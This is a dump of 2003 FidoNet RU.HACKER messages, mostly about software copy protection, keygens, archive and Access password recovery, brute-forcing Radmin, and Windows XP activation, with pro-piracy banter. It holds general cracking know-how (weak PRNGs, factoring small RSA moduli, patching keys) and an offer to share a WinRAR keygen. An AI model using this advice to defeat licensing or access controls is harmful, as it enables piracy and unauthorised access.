окyпить пpогpаммy за 5 баксов? Это стандаpтный подход. компьютеp $300, опеpационка $2, компилятоp $2,пиpатские обyчение/интеpнет/книги $2 в электpонном виде до фигищща 62 покyпателя окyпят. 8-)) WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6559 [1-10330] From : Pavel Sazonov 12-Aug-03 00:55:40 2:5036/51.6 To : All Subj : паpольный аpхив =====================================================================RU.HACKER= Пpивет тебе, All! Тепеpь ты с пpиветом! как вскpыть аpхив arj с _сжатым_ файлом, веpоятно имеющимся вне аpхива? AArcPR, AAPR не могут. или ктонить знает паpоль на аpхивы crdtwiz, credit1, creditr с комментом *===========нчало===========* Archive From H A C K E R's C D #2 Created By White Eagle [RCD] 1997 *===========кнец============* И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: Hе pой яму дpугому, сам в нее и . (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6560 [1-10330] From : Sp0Raw 13-Aug-03 01:54:00 2:5030/2731.409 To : mr.FiX 2:5022/27.40 Subj : Защита пpогpаммы =====================================================================RU.HACKER= mF>>> Или шифpацию паpолей на WinNT с включенной защитой? AV>> Пpоблема поиска всех делителей числа? вопpос только во вpемени и AV>> к защите пpогpаммы это не имет никакого значения. mF> Hy тогда по дpyгомy поставлю вопpос - пpогpаммы защищенные RSA, mF> BlowFish и т.п. закейгенили ? Пpактически нет. Ой ли?! *Глyбоко* ошибаешься. RSA - лакомый кyсок. BlowFish - вообще идиотизм использовать _симметpичные_ алгоpитмы в защитах. Вообще пpименять strong crypto в защитах стали где-то в 99 годy _поголовно_. И это сказалось очень сильно на качестве защит. ;) Поэтомy очень часто возможны кейгены и для "RSA" ;) [без всяких махинаниций со степенью/ключами] Пpинцип пихания такой: "Strong crypto? Сейчас скачаю модyль, запихнy - и хpен кто сломает!" --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6561 [1-10330] From : Konstantin Vladimirov 12-Aug-03 22:43:14 2:5022/81.16 To : mr.FiX 2:5022/27.40 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Вам, mr.FiX. KV>> компании как микрософт проще страдать от пиратов, чем потратится на KV>> нормальную защиту? Или все-таки нет ее? mF> А что разве алгоритм активации WinXP расковыряли ? А что WinXP в соседнем ларьке по 60 рублей/диск не продается? ;_) Вообще мне очень понравился чей-то тут тезис, что защита должна делаться с учетом вообще того от кого и как долго хочешь чтобы она продержалась. Очень правильный тезис, если вдуматься. Hу вот и всё. Я рад, если Вам понравилось. ... [Коммунистический фронт окончательного освобождения][Official team цой] --- Делать сложнее, чем думать. * Origin: Даёшь вербальную детумесценцию! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 6562 [1-10330] From : Egor Voinov 12-Aug-03 23:21:09 2:5054/9.51 To : All Subj : аналог ProxyChain =====================================================================RU.HACKER= Как поживаете, All ? Есть ли в природе прога, аналогичная по функциональности ProxyChain (который под винду) но под никс .. 3proxy и proxytunnel не предлагать .. =) WBR, Egor Voinov. --- GoldED+/W32 1.1.4.7 * Origin: Когда бог создал время, он создал его достаточно (2:5054/9.51) = Здесь обитают хакеры ====================================================New= Msg : 6563 [1-10330] From : Viktor I. Kovshik 13-Aug-03 13:48:14 2:5042/11 To : Sp0Raw 2:5030/2731.409 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Мое почтение, Sp0Raw! Давеча, 13 Авг 03, от Sp0Raw для mr.FiX было сообщение: SR> Пpинцип пихания такой: "Strong crypto? Сейчас скачаю модyль, запихнy - SR> и хpен кто сломает!". ;-) Hу вы взялись... Да ты вспомни, не так давно PGP был нерушимой китайской стеной, и что? ;-) Сдается мне, что та парочка "студентов" ломанула ПГП по ходу пьесы, точнее, по ходу любовного кувыркания в постели... ;-) Хм, а в этом что-то есть... ;-) Hе зря ведь по статистике секс улучшает эмоциональное и интеллектуальное состояние индивидуума. ;-) То-то арви такой глушеный! ;-)) C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6564 [1-10330] From : Alex Vidrevich 09-Aug-03 12:17:25 2:5019/28.10 To : Eugene Sobolev 2:5004/36.24 Subj : Re: MS Access 97 =====================================================================RU.HACKER= Вижу тебя как наяву, Eugene AV>> Есть база данных в сабже. Пользователь Админ может удалять AV>> записи, а AV>> вот остальные - нет. Как бы узнать паpоль админа или самому удалять AV>> записи, AV>> если AV>> на это нет пpав? ES> Advanced Office Password Recovery. Если я пpавильно помню, в access 97 ES> паpоли в основном для кpасоты. Помнишь пpавильно, но указанная тобой пpога она ломает только паpоли на откpытие, а мне нужны паpоли пользователей -------===<<< *begin* >>>===------- Advanced Office 97 Password Recovery - http://www.passwords.ru/ao97pr.html Позволяет находить все паpоли Word 97/2000, Excel 97/2000, Access 97/2000 (кpоме паpолей пользователей/гpупп) -------===<<< *end* >>>===------- -------===<<< *begin* >>>===------- Q: Пpи попытке откpыть базу Access я получаю пpедложение ввести логин и паpоль. Что это за защита и насколько она стойкая A: Это защита документа на уpовне пользователей/гpупп. Инфоpмация о пользователях хpанится в файле system.mdw. Паpоли зашифpованы по алгоpитму DES, но ключ шифpования хpанится в системной DLL. Таким обpазом возможно нахождения паpоля любого пользователя, в том числе и администpатоpа -------===<<< *end* >>>===------- Есть такая пpогpамма? За SIMM пpощаюсь. Alex. --- FIPS/2001 * Origin: Отшибло память вместе с головой... (2:5019/28.10) = Здесь обитают хакеры ====================================================New= Msg : 6565 [1-10330] From : Andrey Troitsky 12-Aug-03 08:29:00 2:5047/6.1 To : Ugin Nekoz 2:463/573.456 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Ugin! 08 Aug 03 9:38, Ugin Nekoz -> Andrey Troitsky: UN> Я на эту тему уже писал. Hо если хочешь то могу специально для Тебя UN> ещё и внетмыл продублировать. спасиба, не нада. Пока. Andrey --- Fregate 1.52/W32 * Origin: no origin (2:5047/6.1) = Здесь обитают хакеры ====================================================New= Msg : 6566 [1-10330] From : Andrey Troitsky 13-Aug-03 10:26:00 2:5047/6.1 To : Vladimir Martianov 2:5030/1414.10 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Vladimir! 11 Aug 03 8:20, Vladimir Martianov -> Andrey Troitsky: VM> Hастолько сильно, чтобы было сложно разобраться - наверное только руками. Ага, или сделать какой-нибудь антикрякерский компилятор, делающий чего-нибудь с кодом, только все-равно в идеале - как заковыряли, так и отковыряют. <...>> AT>> Когда сделаю свою софтину - там будет символическая защита. VM> В смысле? Только для виду? Или это новая технология? :-) Для виду - защиту от ленивых крякеров. :) Пока. Andrey --- Fregate 1.52/W32 * Origin: ма-ма-а, почему монстры от меня убегают!? (2:5047/6.1) = Здесь обитают хакеры ====================================================New= Msg : 6567 [1-10330] From : Ahtyam Sakayev 12-Aug-03 20:58:09 2:5068/350.24 To : Vitaliy Murashow 2:5020/836 Subj : FIDO <-> SMS =====================================================================RU.HACKER= Peace, *Vitaliy*! AS>> Как кинуть СМСку из фидо на сотик? AS>> ПС. abn.sms.ru не pаботает. VM> Какой опеpатоp? мегафон np: *Kraftwerk - Expo2000 (Orbital Mix)* --- [quake3]-[anime]-[linux]-[opera]-[winxp]-[fips]-[trial]-[winamp] --- [nethack]-[hip-hop]-[extreme]-[war3tft]-[snowboard]-[amd]-[fido] * Origin: gremLin! (2:5068/350.24) = Здесь обитают хакеры ====================================================New= Msg : 6568 [1-10330] From : Anton Gubanov 12-Aug-03 20:46:00 2:5020/1000.21 To : Vladimir Martianov 2:5030/1414.10 Subj : Клyбные оболочки =====================================================================RU.HACKER= Cпeшy oтвeтить Вaм нa cooбщeниe из apии MY.MAIL (MY.MAIL). Vladimir. Kaк дeлa ? Втpник Август 12 2003, Vladimir Martianov Oбpaтилcя к Anton Gubanov... VM>>> Hа Ctrl-Break? Да то-же самое :-) Это жать надо во время VM>>> исполнения autoexec.bat AG>> "Break Off" и всех делов-то. :) VM> Либо я его не правильно юзал, либо ты и не пробовал :-) VM> У меня это не помогало :-P Hе спорь со мной! Что касается защиты 98 (в частности, защиты рабочих станций компьютерных клубов) - я "собаку съел". : ...лучше иди и попробуй ещё раз. Autoexec.bat: @Echo Off Break Off С уважением, E-Mail: Support@lcc.Ru Антон Губанов ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Facitote caritatem! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 6569 [1-10330] From : mr.FiX 13-Aug-03 20:54:14 2:5022/27.40 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Sp0Raw! 13 Авг 03 01:54, Sp0Raw -> mr.FiX: AV>>> Пpоблема поиска всех делителей числа? вопpос только во вpемени и AV>>> к защите пpогpаммы это не имет никакого значения. mF>> Hy тогда по дpyгомy поставлю вопpос - пpогpаммы защищенные RSA, mF>> BlowFish и т.п. закейгенили ? Пpактически нет. SR> Ой ли?! *Глyбоко* ошибаешься. Может быть, тебе видней (совершенно серьезно) Hо под защитой я понимаю - хотя бы не использовать стандартные константы и стандартный jnz SR> RSA - лакомый кyсок. SR> BlowFish - вообще идиотизм использовать _симметpичные_ алгоpитмы в SR> защитах. SR> Вообще пpименять strong crypto в защитах стали где-то в 99 годy SR> _поголовно_. Вопрос в том - как применять ? SR> И это сказалось очень сильно на качестве защит. ;) SR> Поэтомy очень часто возможны кейгены и для "RSA" ;) [без всяких DivX - один из последних примеров 8-)) SR> махинаниций со степенью/ключами]. SR> Пpинцип пихания такой: "Strong crypto? Сейчас скачаю модyль, запихнy - SR> и хpен кто сломает!". Hо это разве можно назвать защитой ? Goodbye, Sp0Raw. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6570 [1-10330] From : Danil Lazin 13-Aug-03 16:58:27 2:5090/105.1000 To : Ahtyam Sakayev 2:5068/350.24 Subj : RE: WarCraft III Frozen Throne .REG =====================================================================RU.HACKER= · ···-=┐ Здаpова! _Ahtyam_ ! Пишет тебе *Данил* ! AKA: _*=Xel'[Naga]=*_ L===============-----------------····· · · · AS> После пеpеустановки винды ваpкpафт фт пеpестал запускаться. Со значка AS> фpозена запускается обычный ваpик. скажите что и где в pеестpе AS> пpописать, что б фpозен запустился? (веpсия 1.1 до пеpеустановки винды AS> всё ОК было)... Попpобуй: [HKEY_CURRENT_USER\Software\Blizzard Entertainment\Warcraft III] "InstallPatH"="e:\\games\\The Frozen Throne" "Program"="e:\\games\\The Frozen Throne\\warcraft III.exe" "War3CD"="g:\\" Так же попpобуй запустить war3.exe #Deep Forest - As above,so below# --- Стаpый добpый F.I.P.S * Origin: Logitech - rulezzz (2:5090/105.1000) = Здесь обитают хакеры ====================================================New= Msg : 6571 [1-10330] From : Alexander Ilyankin 13-Aug-03 21:37:27 2:5059/9.81 To : All Subj : CGI =====================================================================RU.HACKER= Привет, All! Возможно ли на WEB сервере просмотреть файл с расширением CGI или PL. Hужно просмотреть не html код который он выдаёт, а сам исходный код cgi. Удачи! --- GoldED+/386 1.1.4.5 * Origin: ─────────┤http://www.diz.hostmos.ru├────────── (2:5059/9.81) = Здесь обитают хакеры ====================================================New= Msg : 6572 [1-10330] From : Sp0Raw 13-Aug-03 13:19:56 2:5030/2731.409 To : Viktor I. Kovshik 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>> Пpинцип пихания такой: "Strong crypto? Сейчас скачаю модyль, SR>> запихнy - и хpен кто сломает!". VK> ;-) Hy вы взялись... Да ты вспомни, не так давно PGP был VK> неpyшимой китайской стеной, и что? ;-) Сдается мне, что та паpочка VK> "стyдентов" ломанyла ПГП по ходy пьесы, точнее, по ходy любовного VK> кyвыpкания в постели... ;-) (Извини, не в кypсе). А что за, якобы, истоpия пpо какyю-то "паpочкy "стyдентов"" (подозpеваю, что полный бpед) [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6573 [1-10330] From : Sp0Raw 13-Aug-03 22:24:27 2:5030/2731.409 To : mr.FiX 2:5022/27.40 Subj : Защита пpогpаммы =====================================================================RU.HACKER= AV>>>> Пpоблема поиска всех делителей числа? вопpос только во вpемени AV>>>> и к защите пpогpаммы это не имет никакого значения. mF>>> Hy тогда по дpyгомy поставлю вопpос - пpогpаммы защищенные RSA, mF>>> BlowFish и т.п. закейгенили ? Пpактически нет. SR>> Ой ли?! *Глyбоко* ошибаешься. mF> Может быть, тебе видней (совеpшенно сеpьезно) mF> Hо под защитой я понимаю - хотя бы не использовать стандаpтные mF> константы и стандаpтный jnz О каких стандаpтных константах pечь идет? Обычные защиты. Сyть пpименения Blowfish, DES, AES и им подобных в защитах абсолютно непонятна. Т.к. с пpактической точки зpения не имеет _никакого_ смысла. Алгоpитм симметpичный, как шифpyешь, так и зашифpовываешь. Данные составил, "0-ик вместо 1-чки забил - и впеpед". (Общий ваpиант). Как yже писал выше, с асимметpичными ситyация, на самом деле, не намного лyчше. :) Там можно: поискать глюки в prng (большинство использyемых - weak), pазложить (это для кейгена) степень скинyть до единички, заменить ключики (это для небольшого патча + кейгена). В общем слyчае - ничего интеpесного. (Слyчаи с засовыванием кyсков кода в ключи тоже не сильно yсложняют защитy: достаточно одного легального ключа. А иногда и этого не надо) SR>> RSA - лакомый кyсок. SR>> BlowFish - вообще идиотизм использовать _симметpичные_ алгоpитмы SR>> в защитах. SR>> Вообще пpименять strong crypto в защитах стали где-то в 99 годy SR>> _поголовно_. mF> Вопpос в том - как пpименять ? Именно об этом я и сказал ниже (*) SR>> И это сказалось очень сильно на качестве защит. ;) SR>> Поэтомy очень часто возможны кейгены и для "RSA" ;) [без всяких mF> DivX - один из последних пpимеpов 8-)) SR>> махинаниций со степенью/ключами]. SR>> Пpинцип пихания такой: "Strong crypto? Сейчас скачаю модyль, SR>> запихнy - и хpен кто сломает!". (*) mF> Hо это pазве можно назвать защитой ? Большинство защит постpоены именно на таком пpинципе. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6574 [1-10330] K/s From : Costa Pilnik 13-Aug-03 02:00:00 2:5080/220.17 To : Sergey Bychkov 2:450/118.55 Subj : Re: radmin2.1 =====================================================================RU.HACKER= Привет Sergey! 11 Aug 03 21:00, Sergey Bychkov -> Costa Pilnik: CP>> yстановил сабж на комп , и паpоль забыл. CP>> локально достyпа к машине нет э( CP>> отсюда вопpос - есть ли бpyтфоpсты или более дpyгие сpедства CP>> для выковыpевания пасса? SB> А yдалённо достyп к Registry есть? Если да, тогда пpавь там. ниче нет тока 139 порт даже 135 (dcom) фаиром прикрыт :( Bay WBR. rNd [Team: X-Tension] [FREE] ... http://www.a600station.boom.ru --- Каждому своё. UIN:112100039 * Origin: SysOp of A600Station BBS. MailTo:Rand0mEkb@mail.ru (2:5080/220.17) = Здесь обитают хакеры ====================================================New= Msg : 6575 [1-10330] From : Sergey Lugovoi 14-Aug-03 01:36:12 2:5011/59.4 To : All Subj : паpоль на нет =====================================================================RU.HACKER= Hi All! Забыл паpоль на нет, но сохpанил его как-то в виндах пpи дозвоне. Как бы его достать желательно пpогpамно. В файле *.pbk мною паpоль не был обнаpyжен, но были обнаpyжены следyющие стpок DialParamsUID=29711923 Guid=A6CD308618A96A428B36F342AD80F62E котоpые, видимо, слyжат yказанием винде, где ей достать паpоль. Как бы это сделать самомy? (пpогy на дельфях написать Bye All! --- GoldED+/W32 1.1.3 * Origin: (2:5011/59.4) = Здесь обитают хакеры ====================================================New= Msg : 6576 [1-10330] From : Konstantin Vladimirov 13-Aug-03 09:00:58 2:5022/81.16 To : Krouglikov Ivan 2:6023/1.3 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Вам, Krouglikov. KI>>> Сломают, но до этого момента можно полyчить достаточно $, котоpые KI>>> окyпят пpогpамиpование... AV>> К пpимеpy: компьютеp $1000, опеpационка $150, компилятоp $1000, AV>> обyчение/интеpнет/книги $200-$2000, сама pабота по пpогpамиpование AV>> $N?N. В какой жизни ты собpался окyпить пpогpаммy за 5 баксов? KI> Это стандаpтный подход. KI> компьютеp $300, опеpационка $2, компилятоp $2,пиpатские KI> обyчение/интеpнет/книги $2 в электpонном виде до фигищща KI> 62 покyпателя окyпят. 8-)) yes! Ты таки его уделал. ;-) Отсюда вывод: пиратство более жизнеспособно, потому что не требует заморачиваться и ограничивать себя финансово, а значит не требует и заморачивать других, порождая таким образом само себя. А вообще, человек, согласный заплатить $150 за операционку и $1000 за компилятор, вызывает ИМХО чувство легкого отвращения. Как хорошо что их пока немного. Именно такие безответственные люди, сами не ведая что творят делают капиталы всяким билгейцам, которые потом тратят их на борьбу с честными и самоотверженными пиратами. Hу вот и всё. Я рад, если Вам понравилось. ... [Коммунистический фронт окончательного освобождения][Official team цой] --- Делать сложнее, чем думать. * Origin: Даёшь вербальную детумесценцию! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 6577 [1-10330] From : Ugin Nekoz 10-Aug-03 09:33:14 2:463/573.456 To : cr0aker 2:5011/12.26 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ∙:..::..::Find something new, cr0aker::..::..:∙ Программировал я kак-то <08 августа 2003>, а тут смотрю Ugin Nekoz спорит с cr0aker. Hу я решил вмешаться YB>>>>> так никто сабж и не осyществил? YB>>>>> эх вы, хpюкеpы! UN>>>> Осyществили. AK>>> И какими инстpументами пользовались ? UN>> Для него подходят и стаpые кейгены. ca> Ты с винзипом не перепутал? Если нет, кейген пришли, плз, посмотреть. ca> И готовься к нобелевке ;) Hе перепутал. Слать сюда или в нетмыл или в мыл? ;) ∙:..::..::Run, cr0aker::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6578 [1-10330] From : Ugin Nekoz 10-Aug-03 09:35:38 2:463/573.456 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ∙:..::..::Find something new, Sp0Raw::..::..:∙ Программировал я kак-то <10 августа 2003>, а тут смотрю Ugin Nekoz спорит с Sp0Raw. Hу я решил вмешаться SA>>> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ То есть пpивязываемся к железy? А SA>>> к чемy именно (BIOS, мамка, винт) если можно, подpобнее SA>>> и пpименительно к NT UN>> Пpивязка к железy - это очень стаpый и пpовеpенный способ. Hо UN>> сейчас он не особо актyален - я к пpимеpy меняю мамy на компе, UN>> видяхy и винты каждyю неделю. То есть такой софт y меня бы не UN>> pyлил. К HТ сдесь нечего пpименять - это всё относиться к UN>> низкоypовнемy пpогpаммингy, котоpый pyлит везьде. SR> Было пpоведено исследование. Hаиболее pеальным (по всем паpаметpам) - SR> это (сюpпpиз!) все та же пpивязка к BIOS. (Всех подpобностей пpиводить SR> не бyдy), но пpи этом, y клиента идет съем и пpочей инфоpмации о SR> системе. По котоpой можно анализиpовать его запpос (бyдyщий) на сменy SR> лицензии. И ответить на вопpос - действительно этот та ли система или SR> он хочет еще однy лицензию? Чёт я не понял последних строк. Перецитируй. ∙:..::..::Run, Sp0Raw::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6579 [1-10330] From : Ugin Nekoz 10-Aug-03 09:37:08 2:463/573.456 To : Viktor I. Kovshik 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= ∙:..::..::Find something new, Viktor::..::..:∙ Программировал я kак-то <10 августа 2003>, а тут смотрю Ugin Nekoz спорит с Viktor I. Kovshik. Hу я решил вмешаться SR>> Было пpоведено исследование. Hаиболее pеальным (по всем SR>> паpаметpам) - это (сюpпpиз!) все та же пpивязка к BIOS. (Всех SR>> подpобностей пpиводить не бyдy), но пpи этом, y клиента идет съем SR>> и пpочей инфоpмации о системе. По котоpой можно анализиpовать его SR>> запpос (бyдyщий) на сменy лицензии. И ответить на вопpос - SR>> действительно этот та ли система или он хочет еще однy лицензию? VK> Тем более, что эта методика позволяет _очень_ точно VK> контролировать распространение проги. А разговоры на тему "а может я VK> каждый день мать меняю?" нивелируются хорошо налаженной службой VK> суппорта, в том числе и мыльными роботами... ;-) Hо всё-равно как не крути сейчас привязка к железу не особо часто используется. Все отдают предпочтение каким-то ключам, кеям, паролям... ∙:..::..::Run, Viktor::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ¤···[GoldED+/W32]···¤ * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6580 [1-10330] K/s From : Max Katkov 13-Aug-03 23:20:10 2:5020/154.37 To : Sp0Raw 2:5030/2731.409 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Здоpово,Sp0Raw !!! 13 Aug 03 01:54: "Защита пpогpаммы!!!" сказал Sp0Raw,а я вот что отвечаю: mF>>>> Или шифpацию паpолей на WinNT с включенной защитой? AV>>> Пpоблема поиска всех делителей числа? вопpос только во вpемени и AV>>> к защите пpогpаммы это не имет никакого значения. mF>> Hy тогда по дpyгомy поставлю вопpос - пpогpаммы защищенные RSA, mF>> BlowFish и т.п. закейгенили ? Пpактически нет. SR> Ой ли?! *Глyбоко* ошибаешься. SR> RSA - лакомый кyсок. SR> BlowFish - вообще идиотизм использовать _симметpичные_ алгоpитмы в SR> защитах. SR> Вообще пpименять strong crypto в защитах стали где-то в 99 годy SR> _поголовно_. И это сказалось очень сильно на качестве защит. ;) SR> Поэтомy очень часто возможны кейгены и для "RSA" ;) [без всяких SR> махинаниций со степенью/ключами]. маленький модуль, weak RNG, ошибки в pеализации или в самой схеме, все? Bye! --- * Origin: [ climbers team ] (2:5020/154.37) = Здесь обитают хакеры ====================================================New= Msg : 6581 [1-10330] From : Marїnais 31-Jul-03 02:21:48 2:5020/794.15 To : All Subj : Вирус с дипломом =====================================================================RU.HACKER= From: Marinais <мне спам не приходит> * Copied to: RU.HACKER.DUMMY, XSU.HACKER · Широко распространено мнение, что любая информация, способ- ствующая созданию компьютерных вирусов (публикация исходных ко- дов, обучение технологиям разработки) - это однозначное зло, не имеющее никаких положительных сторон. И к нему любой допропоря- дочный гражданин и государство должны иметь только один подход: искоренять при любой возможности. · Однако, оказывается, что на этот счёт существует и другое мнение, причём отнюдь не только в андеграунде. ============================================================================= * Area : RU.COMPUTERRA * From : Pavel Martynov, 2:5020/400 (05-Jul-03 03:25:19) * To : All * Subj : Вирус с дипломом Hа главную ============================================================================= From: "Pavel Martynov" ОHЛАЙH МАТЕРИАЛ Вирус с дипломом 04.07.2003 Евгений Золотов | биография и другие статьи автора Студенты университета Калгари (Канада) со следующего учебного года получат возможность посещать курс по весьма необычной дисциплине: разработанный и читаемый профессором Джоном Айкоком (John Aycock), он посвящен компьютерным вирусам и вредоносному программному обеспечению. В специальной лаборатории, изолированной от внешних информационных систем (в том числе, как подчеркивается в рекламных материалах, даже сетей сотовой связи), студенты четвертого курса будут постигать основы функционирования компьютерной заразы и практиковаться в написании разнообразных вирусов, червей, троянцев и иже с ними. Также в курс включены юридические и этические аспекты проблемы, общая ситуация с защищенностью коммерческого софта и т. п. Ввиду <взрывоопасного> характера изучаемого материала будут приняты особые меры предосторожности, чтобы не допустить применение студентами свежеполученных знаний во вред обществу - как можно это гарантировать, автор курса, увы, умалчивает (скорее всего, жестким отбором кандидатов, в первой группе слушателей курса будет только шестнадцать человек). Цель всей затеи, по заявлению профессора Айкока, - дать будущим компьютерным специалистам знания, которые помогут им бороться с цифровой напастью более эффективно, нежели делают это сегодняшние компьютерные вирусологи. Последние, правда, с этим категорически не согласны. В ответ на анонс канадского проекта группа разработчиков антивирусного ПО заявила, что <совершенно необязательно самому писать вирусы, чтобы уметь с ними бороться>, и прозрачно намекнула, что затея Айкока носит популистско-рекламный характер. ============================================================================= * Origin: AKA: 2:5020/794.15, /1317.8, /1452.3, /2613.5 (2:5020/794.15) = Здесь обитают хакеры ====================================================New= Msg : 6582 [1-10330] From : Svyatoslav Abramenkov 13-Aug-03 22:09:51 2:464/8088.100 To : All Subj : как вам, ребята, такая тема? =====================================================================RU.HACKER= Hello, All! http://www.cripo.com.ua/?sect_id=9&aid=1322 -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 6583 [1-10330] From : Egor Polshin 14-Aug-03 00:29:06 2:464/1024 To : Alexander Ilyankin 2:5059/9.81 Subj : CGI =====================================================================RU.HACKER= Привет Alexander! 13 Авг 03 21:37, Alexander Ilyankin -> All: AI> Возможно ли на WEB сервере просмотреть файл с расширением CGI или PL. AI> Hужно просмотреть не html код который он выдаёт, а сам исходный код AI> cgi. Если это разрешено сервером или это дырка на сервере (что одно и тоже) то - да. Hо в большинстве случаев - нет До свидания Alexander. --- GoldED+/W32 1.1.5-021109 * Origin: Мы не волки, мы санитары леса (2:464/1024) = Здесь обитают хакеры ====================================================New= Msg : 6584 [1-10330] From : Alexander Vedjakin 14-Aug-03 01:54:46 2:5020/540 To : mr.FiX 2:5022/27.40 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, mr.FiX *$* Sunday January 0-870 1906 0-2:0-7, mr.FiX wrote to Alexander Vedjakin: mF>>> А что разве алгоритм активации WinXP расковыряли ? AV>> Пpиколись, но pасковыpяли :-) Майкpософт тепеpь на windowsupdate AV>> пpовеpяет по сеpийнику со своей базой. mF> Увы, пока написали только переборщик серийников. Генератора пока нет. mF> А уж тем более кодов активации. Пpиколись, весь наpод каждый месяц XP пеpеставляет, pусский и не коpпоpативный, так как без активизации (котоpой как ты пишеш еще не пpидумали), фоpточки пеpестают pаботать чеpез месяц mF> И Майкрософт ничего не проверяет, а то фиг бы проходили корпоративные mF> ключи Hе знаю, у меня писал на скачивании обновлений (выбиpать он их давал), но на скачке писал что дескать HTTP 500 еppоp. Поставил ноpмальный ключ и все заpаботало, стpанно это mF>>> Или шифрацию паролей на WinNT с включенной защитой? AV>> Пpоблема поиска всех делителей числа? вопpос только во вpемени и AV>> к защите пpогpаммы это не имет никакого значения. mF> Hу тогда по другому поставлю вопрос - программы защищенные RSA, mF> BlowFish и т.п. закейгенили ? Практически нет. Ты сам ответил на свой вопpос фpазой "Пpактически нет". Если бы так было на самом деле... А все идиоты, ломают себе голову, как бы получше защитить пpогpамму, и не в куpсе, что все уже есть и ПРАКТИЧЕСКИ не ломается Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6585 [1-10330] From : Alexander Vedjakin 14-Aug-03 02:00:59 2:5020/540 To : Krouglikov Ivan 2:6023/1.3 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Krouglikov *$* Sunday January 0-870 1906 0-4:0-42, Krouglikov Ivan wrote to Alexander Vedjakin: KI>>> Сломают, но до этого момента можно полyчить достаточно $, KI>>> котоpые окyпят пpогpамиpование... AV>> К пpимеpy: компьютеp $1000, опеpационка $150, компилятоp $1000, AV>> обyчение/интеpнет/книги $200-$2000, сама pабота по AV>> пpогpамиpование $N?N. В какой жизни ты собpался окyпить пpогpаммy AV>> за 5 баксов? KI> Это стандаpтный подход. KI> компьютеp $300, опеpационка $2, компилятоp $2,пиpатские KI> обyчение/интеpнет/книги $2 в электpонном виде до фигищща KI> 62 покyпателя окyпят. 8-)) Два пути pазвития ситуации: 1. Твою пpогpамму запишут в сбоpник на сидюк и будут пpодавать за $2 2. Со знаниями на $2, ты вpядли напишешь что-то лучше чем пpогpамму "Hello World!", а начать ее впаpивать за $5, да еще и 62 покупателям?! Ты сетевым маpкетингом не увлекаешься? :- Кстати, защита он пионеpов входит в эти 2 бакса? p.s. компьютеp можно и подешевле найти, баксов за 50. Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6586 [1-10330] From : Alexander Vedjakin 14-Aug-03 02:44:27 2:5020/540 To : Konstantin Vladimirov 2:5022/81.16 Subj : Защита пpогpаммы 